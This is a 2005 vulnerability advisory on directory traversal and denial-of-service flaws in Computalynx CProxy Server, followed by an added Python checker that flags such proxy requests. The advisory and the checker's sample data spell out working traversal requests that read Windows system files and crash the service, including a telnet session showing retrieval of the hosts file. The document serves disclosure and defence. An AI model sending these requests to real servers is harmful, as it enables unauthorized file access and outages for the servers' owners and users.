
CProxyRemote.txt

Date: 03 Mar 2005 | Reported by: Kristof Philipsen | Type: packetstorm | Source: packetstormsecurity.com

Multiple vulnerabilities in Computalynx CProxy Server allow file access and Denial-of-Service attacks.

`+=========================================================================================+
| Security Advisory: Computalynx CProxy Server Multiple Remote Vulnerabilities            |
+=========================================================================================+
| [email protected]                                                        March 02, 2005 |
+=========================================================================================+
  
  
  
AFFECTED PRODUCTS  
  
Affected Software:  
  
- Computalynx CProxy 3.3.x for Win32  
- Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32  
  
Possibly other software versions are affected.  
  
  
  
IDENTIFIED ISSUES  
  
The following issues were found to affect the aforementioned Computalynx   
CProxy Server software:  
  
[1] Directory Traversal and Arbitrary File Access Attack  
[2] Denial-of-Service Attack  
  
  
  
BRIEF DESCRIPTION  
  
Computalynx CProxy is a Windows platform based proxy server featuring HTTP, Telnet, POP3,
SMTP and FTP proxy functions, as well as Anti Virus and Content Filtering capabilities.
Because of inadequate input validation, a malicious attacker can perform a directory
traversal attack and thus gain access to arbitrary files located on the CProxy Server
system. Moreover, using the same attack vector with specially crafted HTTP requests, it is
possible to crash the CProxy service running on the remote system.
  
  
  
DETAILED DESCRIPTION  
  
Computalynx CProxy Server is a multifunctional Windows platform based proxy server with
multi-protocol support. When performing proxy functions, CProxy Server is vulnerable to a
directory traversal attack. Inadequate input validation and input filtering allow a remote
attacker to gain access to arbitrary files on the Windows system upon which the CProxy
Server software has been deployed. This first issue of directory traversal arises because
the CProxy Server fails to filter out double dot attacks and in turn fails to protect
arbitrary files from being requested and opened using the proxy service. A specially
crafted URL allows arbitrary files to be recovered from the system. The retrieval of system
files can compromise the entire system or expose the system to further avenues of attack.
A malicious attacker can perform a request using the following format to gain access to
arbitrary data:
  
GET http://<path-to-target-directory>/<filename> HTTP/1.0<CRLF><CRLF>  
  
An attacker can gain access to a file in the WINNT directory as shown in the following
example, by connecting to CProxy Server's proxy service (listening on TCP port 8080 by
default), and executing the following request:
  
  
ronin[kris] ~ $ telnet 10.0.0.1 8080  
Trying 10.0.0.1...  
Connected to 10.0.0.1.  
Escape character is '^]'.  
GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0  
  
  
  
HTTP/1.0 200 OK  
Content-length: 734  
Date: Sat, 19 Feb 2005 21:09:58 GMT  
Date: Sat, 19 Feb 2005 21:09:58 GMT  
# Copyright (c) 1993-1999 Microsoft Corp.  
#  
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.  
#  
# This file contains the mappings of IP addresses to host names. Each  
# entry should be kept on an individual line. The IP address should  
# be placed in the first column followed by the corresponding host name.  
# The IP address and the host name should be separated by at least one  
# space.  
#  
# Additionally, comments (such as these) may be inserted on individual  
# lines or following the machine name denoted by a '#' symbol.  
#  
# For example:  
#  
# 102.54.94.97 rhino.acme.com # source server  
# 38.25.63.10 x.acme.com # x client host  
  
  
  
127.0.0.1 localhost  
Connection closed by foreign host.  
  
  
In addition to the "GET" method, other HTTP methods such as "POST" and "HEAD" will also
lead to arbitrary file retrieval.
  
Retrieving an arbitrary ASCII file using the "GET" method causes the file to be displayed
and, immediately afterwards, causes the CProxy Server service to crash with an error
message indicating that "memory could not be read". However, retrieving this same ASCII
file using the "POST" or "HEAD" methods causes the file contents to be displayed and does
not crash the CProxy Server service, allowing an attacker to execute multiple requests and
thus allowing various arbitrary files to be retrieved from the CProxy Server system.
  
* The following request will cause the arbitrary file to be displayed:

-> "POST http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"
  
* The following request will cause the arbitrary file to be displayed and the CProxy Server
service to crash:
  
-> "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"  
  
Attempting to retrieve an executable file using any of these HTTP methods ("GET", "HEAD",
or "POST") in the aforementioned manner causes the contents of the executable file to be
displayed and the CProxy Server service to crash with an error message that "memory could
not be read", rendering the service unavailable and thus resulting in a Denial-of-Service
condition.
  
* Both of the following requests will cause the arbitrary executable's contents to be
displayed and the CProxy Server service to crash:
  
-> "GET http://../../../../../winnt/system32/cmd.exe"  
-> "POST http://../../../../../winnt/system32/cmd.exe"  
  
  
  
CHARACTERISTICS  
  
* Inadequate input validation and filtering allows an attacker to perform directory
traversal attacks against the systems running Computalynx CProxy Server.

* Different vectors of attack allow retrieval of arbitrary and possibly sensitive files
from the system running Computalynx CProxy Server.

* Use of specially crafted URLs allows attackers to render the service unavailable,
causing a Denial-of-Service condition.
  
  
  
SEVERITY  
  
Each of these two issues affecting Computalynx CProxy Server software can directly or
indirectly allow partial or complete compromise of the system and/or the data stored on
the system running the CProxy Server software.

Moreover, the second issue regarding a Denial-of-Service attack against the CProxy Server
software will directly affect any users depending on the availability of the functions
which the CProxy Software performs on this system.
  
Classification: MEDIUM to HIGH  
  
  
  
VENDOR STATUS  
  
19/Feb/2005 - Computalynx contacted regarding this issue.  
02/Mar/2005 - At present, the vendor has not replied regarding this issue.  
  
  
  
SOLUTION  
  
* Currently awaiting vendor status for a solution regarding this issue.  
  
* A mitigation strategy against attacks of this nature would be to ensure that remote
connections to the CProxy Server are not authorised (i.e. through the use of proper
firewall rules).
  
  
  
REFERENCES  
  
[1] "Computalynx Software"  
- http://www.computalynx.com  
  
  
  
--   
Kristof Philipsen  
Security Engineer   
  
Ubizen - a Cybertrust company  
18 rue Robert Stumper  
L-2557 Luxembourg  
Luxembourg  
T: +352 26 31 05 85  
F: +352 26 31 05 86  
E-mail: [email protected]  
  
www.ubizen.com - www.cybertrust.com  
  
`
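
A defender-side check for the request shape the advisory describes, as an added example that is not part of the original advisory or of CProxy: it parses proxy request lines and flags an absolute URI whose authority is not a real host name (here "..") or whose path carries dot-dot segments. The function names and sample lines are assumptions made for illustration, and the percent-encoded variant goes beyond the plain form shown in the advisory.

```python
import ipaddress
import re
from urllib.parse import urlsplit, unquote

# One DNS label: letters, digits, hyphens; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

def valid_host(host):
    """True if host is an IP literal or a syntactically valid DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    labels = host.rstrip(".").split(".")
    return len(host) <= 253 and all(_LABEL.fullmatch(l) for l in labels)

def inspect_request_line(line):
    """Return findings for one proxy request line; an empty list means clean."""
    parts = line.split()
    if len(parts) < 2:
        return ["malformed request line"]
    target = parts[1]
    if not target.lower().startswith(("http://", "https://")):
        return []  # origin-form or CONNECT target: out of scope here
    try:
        url = urlsplit(target)
        host = url.hostname or ""
    except ValueError:
        return ["unparseable request target"]
    findings = []
    if not valid_host(host):
        findings.append(f"authority {url.netloc!r} is not a host name or IP literal")
    # Decode once and treat '\' as a separator, as a Windows file system would.
    if ".." in unquote(url.path).replace("\\", "/").split("/"):
        findings.append("dot-dot segment in path")
    return findings

# Constructed sample input: the first two lines use the request shapes quoted
# in the advisory; the rest are made-up benign and encoded variants.
SAMPLE = [
    "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0",
    "POST http://../../../../../winnt/system32/cmd.exe",
    "GET http://www.example.com/index.html HTTP/1.0",
    "HEAD http://10.0.0.1/a/b.txt HTTP/1.0",
    "GET http://www.example.com/a/%2e%2e/%2e%2e/x HTTP/1.0",
]

def flag_lines(lines):
    """Map each suspicious request line to its findings."""
    return {l: f for l in lines if (f := inspect_request_line(l))}
```

The same check can run as a filter in front of the proxy or as a retrospective search over captured request lines; it complements the firewall mitigation in the advisory and does not replace it.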
